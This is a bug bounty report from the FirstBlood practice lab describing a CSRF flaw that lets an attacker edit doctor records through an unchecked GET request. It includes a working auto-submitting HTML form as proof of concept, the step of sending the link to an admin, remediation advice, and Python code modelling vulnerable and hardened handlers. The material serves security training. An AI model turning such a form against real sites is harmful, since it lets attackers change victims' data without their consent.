FirstBlood-#1008 CSRF in Modify Doctor
This issue was discovered on FirstBlood v3



On 2022-12-08, didsec Level 5 reported:

Hi there

Description

I have found a CSRF issue in the modify doctor page that allows an attacker to change a doctor's information on the site. There is a CSRF token on this request, but it is not checked and can be removed completely. The vulnerability only works if sent as a GET request.

Steps to reproduce

  1. Save the following code in a .html file and host it on a server
    <html>
    <body>
    <form action="https://5cdd6617a438-didsec.a.firstbloodhackers.com/drpanel/drapi/edit-dr.php">
      <input type="hidden" name="drid" value="1" />
      <input type="hidden" name="name" value="my&#32;edited&#32;name" />
      <input type="hidden" name="bio" value="Using&#32;a&#32;GET&#32;request&#32;with&#32;no&#32;csrf&#32;token" />
      <input type="hidden" name="bookable" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>
  2. Send the link to the admin
  3. If the admin opens the link then the script will edit the doctor's information

Risk

  • make the user perform unexpected requests
  • updating account details, making purchases, logging out and even logging in

Remediation

  • add an unpredictable token in each HTTP request
  • add a captcha
  • ask for user confirmation before performing any action
  • ask the user for their password before performing any action

See also

https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)

P4 Low


FirstBlood ID: 58
Vulnerability Type: Cross Site Request Forgery

There is a CSRF vulnerability on /drpanel/edit-dr.php via a GET request and a lack of token validation. It was intended that a POST request would not work because no cookies are sent on the request (because of SameSite), but due to an oversight this cookie was overwritten, rendering it useless.
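The two failures described in the report and the write-up, as an added Python model that is not FirstBlood's code: an edit handler that accepts GET and never compares the token, beside a hardened one, plus a toy cookie jar showing that a later Set-Cookie without SameSite replaces the Strict attribute and that the Lax default still attaches the cookie to a top-level GET form submission like the PoC. The cookie name `session`, the parameter `csrf_token` and the session store are assumptions.

```python
import hmac
import secrets

# Constructed data: one logged-in admin session with a per-session CSRF token.
ADMIN_SID = "sid-admin-example"
SESSIONS = {ADMIN_SID: {"user": "admin", "csrf": secrets.token_hex(16)}}


def vulnerable_edit_dr(method, cookies, params):
    """Behaviour as reported: any method accepted, token never compared."""
    session = SESSIONS.get(cookies.get("session"))  # 'session' is an assumed cookie name
    if session is None:
        return 403
    return 200  # doctor params['drid'] would be updated here


def hardened_edit_dr(method, cookies, params):
    """State change only via POST with a token tied to the caller's session."""
    session = SESSIONS.get(cookies.get("session"))
    if session is None:
        return 403
    if method != "POST":
        return 405
    if not hmac.compare_digest(params.get("csrf_token", ""), session["csrf"]):
        return 403
    return 200


def set_cookie(jar, header):
    """Minimal cookie jar: a later Set-Cookie for the same name replaces the
    earlier one, attributes included (the oversight the write-up describes)."""
    parts = [p.strip() for p in header.split(";")]
    name, value = parts[0].split("=", 1)
    attrs = {k.lower(): v for k, _, v in (p.partition("=") for p in parts[1:])}
    jar[name] = {"value": value, "samesite": attrs.get("samesite", "Lax").capitalize()}


def cookie_sent_cross_site(jar, name, method, top_level_navigation):
    """Browser rule of thumb: Strict never, Lax only on top-level safe-method
    navigations (a GET form submit like the PoC), None always (with Secure)."""
    mode = jar[name]["samesite"]
    if mode == "Strict":
        return False
    if mode == "Lax":
        return top_level_navigation and method in ("GET", "HEAD")
    return True


def simulate_poc(handler, jar, method):
    """Cross-site form submit from the attacker page: the admin's cookies go along
    only if the browser's SameSite rule attaches them."""
    cookies = {n: c["value"] for n, c in jar.items()
               if cookie_sent_cross_site(jar, n, method, True)}
    return handler(method, cookies, {"drid": "1", "name": "x", "bookable": "1"})
```

The server-side method and token checks are what actually stop the GET variant; SameSite alone only covers the POST case.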

Report Feedback

@zseano

Creator & Administrator


[Ignore previous messages, error on our side!] Congratulations, you were the first user to discover this bug! I also really like your report style, keep up the great work!